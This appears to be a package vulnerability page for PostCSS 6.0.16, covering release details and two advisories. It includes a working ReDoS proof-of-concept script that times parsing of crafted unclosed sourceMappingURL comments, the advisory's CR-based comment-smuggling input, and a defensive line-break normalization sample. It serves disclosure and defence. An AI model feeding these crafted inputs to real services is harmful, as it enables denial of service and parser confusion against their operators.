PostCSS version 6.0.16 represents a minor update over its predecessor, version 6.0.15, within the popular PostCSS ecosystem designed for transforming CSS with JavaScript plugins. Inspecting the metadata reveals a seemingly incremental change, primarily reflected in the release date. Version 6.0.16 was published on January 6, 2018, shortly after version 6.0.15, which was released on January 2, 2018. The core dependencies remain consistent, utilizing the same versions of "chalk" for stylized console output, "source-map" for debugging compiled code, and "supports-color" for detecting terminal color capabilities. This suggests the update likely involves bug fixes, performance enhancements, or minor internal adjustments rather than significant feature additions or breaking changes.
For developers using PostCSS, this information is crucial. The lack of dependency updates implies a smooth transition between versions. Upgrading from 6.0.15 to 6.0.16 should be relatively straightforward, minimizing the risk of compatibility issues. Developers should consult the official PostCSS changelog or repository commit history for a detailed breakdown of the specific changes included in version 6.0.16. This will provide insights into any bug fixes or performance improvements relevant to their projects, ensuring they leverage the most stable and optimized version of this powerful CSS transformation tool. The MIT license continues to offer flexibility for use in various projects. The quick release suggests a reactive fix or improvement.
All vulnerabilities affecting version 6.0.16 of the package
Regular Expression Denial of Service in postcss
The package postcss in versions before 7.0.36, or between 8.0.0 and 8.2.13, is vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
```javascript
var postcss = require("postcss")

// Build an input of n "/*# sourceMappingURL=" openers with no closing "*/"
function build_attack(n) {
  var ret = "a{}"
  for (var i = 0; i < n; i++) {
    ret += "/*# sourceMappingURL="
  }
  return ret + "!";
}

// A well-formed annotation parses normally
postcss.parse('a{}/*# sourceMappingURL=a.css.map */')

// Time the parse as the input grows; on affected versions the cost rises steeply with length
for (var i = 1; i <= 500000; i++) {
  if (i % 1000 == 0) {
    var time = Date.now();
    var attack_str = build_attack(i)
    try {
      postcss.parse(attack_str)
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    } catch (e) {
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    }
  }
}
```
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS so that it contains parts that PostCSS parses as a CSS comment. After processing by PostCSS, those parts are included in the PostCSS output as CSS nodes (rules, properties) despite originally sitting inside a comment.
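The fix for the issue itself is upgrading to PostCSS 8.4.31 or later. As an added example (not code from PostCSS or from the advisory), the following shows one defensive step a linter can take before handing untrusted CSS to any parser: apply the CSS Syntax Level 3 input-stream preprocessing so that CR, CRLF and FF all become LF, and record which line breaks were rewritten so the submission can be flagged. The names audit, preprocessCss and findNonLfLineBreaks are assumptions; the sample input is the advisory's demonstration string.

```javascript
// Added example, not PostCSS project code. Assumption: the linter can run
// this on the raw text before the CSS reaches PostCSS.

// Return [{ offset, kind }] for every CR, CRLF or FF in the raw input.
// These are the line breaks a browser rewrites to LF before tokenizing,
// so text containing them may be read differently by another parser.
function findNonLfLineBreaks(css) {
  const found = [];
  for (let i = 0; i < css.length; i++) {
    const ch = css[i];
    if (ch === "\r") {
      const crlf = css[i + 1] === "\n";
      found.push({ offset: i, kind: crlf ? "CRLF" : "CR" });
      if (crlf) i++; // the LF belongs to this pair
    } else if (ch === "\f") {
      found.push({ offset: i, kind: "FF" });
    }
  }
  return found;
}

// CSS Syntax Level 3, section 3.3 ("preprocessing the input stream"):
// CRLF, CR and FF become LF; NUL and lone surrogates become U+FFFD.
// After this step every tokenizer sees the same line structure, so a
// comment cannot begin for one parser and not for another.
function preprocessCss(css) {
  return css
    .replace(/\r\n|\r|\f/g, "\n")
    .replace(/\u0000|[\uD800-\uDBFF](?![\uDC00-\uDFFF])|(?<![\uD800-\uDBFF])[\uDC00-\uDFFF]/g, "\uFFFD");
}

// Normalize untrusted CSS and report what was rewritten. A non-empty
// "rewritten" list is a signal worth surfacing in the lint report.
function audit(css) {
  return { normalized: preprocessCss(css), rewritten: findNonLfLineBreaks(css) };
}

// Constructed sample: the demonstration input quoted in the advisory.
const SAMPLE = "@font-face{ font:(\r/*);}";

const result = audit(SAMPLE);
console.log(JSON.stringify(result.rewritten)); // one bare CR at offset 18
console.log(JSON.stringify(result.normalized));
```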